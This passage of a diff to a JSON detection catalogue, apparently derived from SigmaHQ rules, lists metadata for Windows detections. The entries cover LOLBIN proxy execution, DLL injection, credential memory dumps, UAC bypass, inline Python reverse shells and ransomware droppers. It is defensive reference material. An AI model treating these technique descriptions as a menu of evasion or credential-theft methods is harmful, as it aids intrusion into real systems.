"https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "d047726b-c71c-4048-a99b-2e2f50dc107d", - "value": "Kavremover Dropped Binary LOLBIN Usage" - }, - { - "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/19", - "falsepositive": [ - "Legitimate usage of the script by a developer" - ], - "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nas_bench/status/1535981653239255040", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216.001" - ] - }, - "uuid": "45d3a03d-f441-458c-8883-df101a3bb146", - "value": "Launch-VsDevShell.PS1 Proxy Execution" - }, - { - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "meta": { - "author": "frack113, Florian Roth", - "creation_date": "2021/07/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", - "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", - "https://twitter.com/gN3mes1s/status/941315826107510784", - "https://reaqta.com/2017/12/mavinject-microsoft-injector/", - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://github.com/SigmaHQ/sigma/issues/3742", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" - ] - }, - "uuid": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", - "value": "Mavinject Inject DLL Into Running Process" + "uuid": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "value": "Disabled Volume Snapshots" }, { "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", @@ -40507,404 +32538,910 @@ "value": "Use of Mftrace.exe" }, { - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/13", + "author": "Florian Roth", + "creation_date": "2021/05/27", "falsepositive": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Possible but rare" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml", + "filename": "proc_creation_win_susp_rundll32_no_params.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml" + "https://www.cobaltstrike.com/help-opsec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1202" ] }, - "uuid": "9c8c7000-3065-44a8-a555-79bcba5d9955", - "value": "Execute MSDT Via Answer File" + "uuid": "1775e15e-b61b-4d14-a1a3-80981298085a", + "value": "Suspicious Rundll32 Without Any CommandLine Params" }, { - "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/19", + "author": "Florian Roth, Tim Shelton (fp werfault)", + "creation_date": "2022/11/10", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_lolbin_msohtmed_download.yml", + "filename": "proc_creation_win_sysmon_exploitation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/filip_dragovic/status/1590104354727436290", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120", + "https://twitter.com/filip_dragovic/status/1590052248260055041", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml" + ], + "tags": "No established tags" + }, + "uuid": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", + "value": "Suspicious Sysmon as Execution Parent" + }, + { + "description": "Detects a process memory dump performed by RdrLeakDiag.exe", + "meta": { + "author": "Cedric MAURUGEON", + "creation_date": "2021/09/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_process_dump_rdrleakdiag.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.pureid.io/dumping-abusing-windows-credentials-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "value": "Process Dump via RdrLeakDiag.exe" + }, + { + "description": "Detects specific process parameters as used by Mustang Panda droppers", + "meta": { + "author": "Florian Roth, oscd.community", + "creation_date": "2019/10/30", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_mustangpanda.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/", + "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml" + ], + "tags": [ + "attack.t1587.001", + "attack.resource_development" + ] + }, + "uuid": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "value": "Mustang Panda Dropper" + }, + { + "description": "Detects the use of a Visual Studio bundled tool named DumpMinitool.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_proc_dump_dumpminitool.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml" + "https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=DvVrzeZ1OcGiWowbhPV8Lg", + "https://twitter.com/mrd0x/status/1511489821247684615", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml" ], "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.t1036", + "attack.t1003.001" ] }, - "uuid": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", - "value": "Download Arbitrary Files Via MSOHTMED.EXE" + "uuid": "dee0a7a3-f200-4112-a99b-952196d81e42", + "value": "DumpMinitool Usage" }, { - "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", + "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/19", + "author": "Markus Neis, Sander Wiebing", + "creation_date": "2018/11/22", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_lolbin_mspub_download.yml", + "filename": "proc_creation_win_susp_file_characteristics.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml" + "https://securelist.com/muddywater/88059/", + "https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.006" + ] + }, + "uuid": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", + "value": "Suspicious File Characteristics Due to Missing Fields" + }, + { + "description": "Detects specific process characteristics of Maze ransomware word document droppers", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_crime_maze_ransomware.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "value": "Maze Ransomware" + }, + { + "description": "Detects when a program changes the default file association of any extension to an executable", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_change_default_file_assoc_susp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.001" + ] + }, + "uuid": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "value": "Change Default File Association To Executable" + }, + { + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown sub processes of Wsreset.exe" + ], + "filename": "proc_creation_win_uac_bypass_wsreset.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", + "https://www.activecyber.us/activelabs/windows-uac-bypass", + "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", + "https://twitter.com/ReaQta/status/1222548288731217921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "value": "Bypass UAC via WSReset.exe" + }, + { + "description": "Detects LockerGoga Ransomware command line.", + "meta": { + "author": "Vasiliy Burov, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_mal_lockergoga_ransomware.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a", + "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/", + "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "74db3488-fd28-480a-95aa-b7af626de068", + "value": "LockerGoga Ransomware" + }, + { + "description": "Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_python_inline_command_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.revshells.com/", + "https://docs.python.org/3/using/cmdline.html#cmdoption-c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "899133d5-4d7c-4a7f-94ee-27355c879d90", + "value": "Python Inline Command Execution" + }, + { + "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation but rarely used by administrators", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/08/13", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "filename": "proc_creation_win_susp_whoami.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "e28a5a99-da44-436d-b7a0-2afc20a5f413", + "value": "Whoami Execution" + }, + { + "description": "Detects a ping command that uses a hex encoded IP address", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/23", + "falsepositive": [ + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + ], + "filename": "proc_creation_win_susp_ping_hex_ip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna", + "https://twitter.com/vysecurity/status/977198418354491392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml" ], "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.t1140", + "attack.t1027" ] }, - "uuid": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", - "value": "Download Arbitrary Files Via MSPUB.EXE" + "uuid": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "value": "Ping Hex IP" }, { - "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_schtasks_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "89ca78fd-b37c-4310-b3d3-81a023f83936", + "value": "Schtasks Creation Or Modification With SYSTEM Privileges" + }, + { + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_parent_of_conhost.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parent_of_conhost.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", + "value": "Conhost Spawned By Suspicious Parent Process" + }, + { + "description": "Detects a ZxShell start by the called and well-known function name", + "meta": { + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2017/07/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_zxshell.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.defense_evasion", + "attack.t1218.011", + "attack.s0412", + "attack.g0001" + ] + }, + "uuid": "f0b70adb-0075-43b0-9745-e82a1c608fcc", + "value": "ZxShell Malware" + }, + { + "description": "Attackers may leverage fsutil to enumerated connected drives.", "meta": { "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "creation_date": "2022/01/25", + "creation_date": "2022/03/29", "falsepositive": [ - "Rare false positives could occur on servers with multiple drives." + "Certain software or administrative tasks may trigger false positives." ], - "filename": "proc_creation_win_lolbin_not_from_c_drive.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://www.scythe.io/library/threat-emulation-qakbot", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_not_from_c_drive.yml" - ], - "tags": [ - "attack.t1218.001" - ] - }, - "uuid": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", - "value": "LOLBIN From Abnormal Drive" - }, - { - "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", - "meta": { - "author": "frack113", - "creation_date": "2022/03/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_offlinescannershell.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_offlinescannershell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "02b18447-ea83-4b1b-8805-714a8a34546a", - "value": "Suspicious OfflineScannerShell.exe Execution From Another Folder" - }, - { - "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/16", - "falsepositive": [ - "Legitimate use by an administrator" - ], - "filename": "proc_creation_win_lolbin_openconsole.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nas_bench/status/1537563834478645252", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "814c95cc-8192-4378-a70a-f1aafd877af1", - "value": "Use of OpenConsole" - }, - { - "description": "Execute commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This is used as a LOLBIN for example to bypass application whitelisting.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/14", - "falsepositive": [ - "Legitimate use by a via a batch script or by an administrator." - ], - "filename": "proc_creation_win_lolbin_pcalua.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Pcalua/", - "https://pentestlab.blog/2020/07/06/indirect-command-execution/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", - "value": "Use of Pcalua For Execution" - }, - { - "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", - "meta": { - "author": "A. Sungurov , oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", - "Legit usage of scripts" - ], - "filename": "proc_creation_win_lolbin_pcwrun.yml", + "filename": "proc_creation_win_fsutil_drive_enumeration.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/991335019833708544", - "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml" + "Turla has used fsutil fsinfo drives to list connected drives. https://attack.mitre.org/techniques/T1120/", + "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1120" + ] + }, + "uuid": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", + "value": "Fsutil Drive Enumeration" + }, + { + "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", + "meta": { + "author": "frack113", + "creation_date": "2021/12/06", + "falsepositive": [ + "Legitimate query of a service by an administrator to get more information such as the state or PID" + ], + "filename": "proc_creation_win_sc_query.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_query.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1007" + ] + }, + "uuid": "57712d7a-679c-4a41-a913-87e7175ae429", + "value": "SC.EXE Query Execution" + }, + { + "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs", + "meta": { + "author": "frack113", + "creation_date": "2022/12/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_ssh.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ssh/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1218" ] }, - "uuid": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", - "value": "Indirect Command Execution By Program Compatibility Wizard" + "uuid": "7d6d30b8-5b91-4b90-a891-46cccaf29598", + "value": "Lolbin Ssh.exe Use As Proxy" }, { - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", + "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/13", + "author": "Agro (@agro_sev) oscd.communitly", + "creation_date": "2020/10/13", "falsepositive": [ - "Unlikely" + "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." ], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml", + "filename": "proc_creation_win_susp_use_of_sqltoolsps_bin.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml", + "https://twitter.com/pabraeken/status/993298228840992768", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqltoolsps_bin.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "value": "SQL Client Tools PowerShell Session Detection" + }, + { + "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", + "meta": { + "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_register_cimprovider.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/PhilipTsukerman/status/992021361106268161", + "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574" + ] + }, + "uuid": "a2910908-e86f-4687-aeba-76a5f996e652", + "value": "DLL Execution Via Register-cimprovider.exe" + }, + { + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "meta": { + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", + "creation_date": "2019/10/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_run_powershell_script_from_ads.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1535663791362519040", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml" + "https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_ads.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" - ] - }, - "uuid": "6004abd0-afa4-4557-ba90-49d172e0a299", - "value": "Execute Pcwrun.EXE To Leverage Follina" - }, - { - "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", - "meta": { - "author": "frack113", - "creation_date": "2022/03/17", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_lolbin_pktmon.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Pktmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1040" - ] - }, - "uuid": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", - "value": "Use of PktMon.exe" - }, - { - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/01", - "falsepositive": [ - "Legitimate \".xbap\" being executed via \"PresentationHost\"" - ], - "filename": "proc_creation_win_lolbin_presentationhost.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", - "value": "Application Whitelisting Bypass via PresentationHost.exe" - }, - { - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_presentationhost_download.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/239/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", - "value": "Download Arbitrary Files Via PresentationHost.exe" - }, - { - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", - "meta": { - "author": "frack113", - "creation_date": "2022/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_printbrm.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml" - ], - "tags": [ 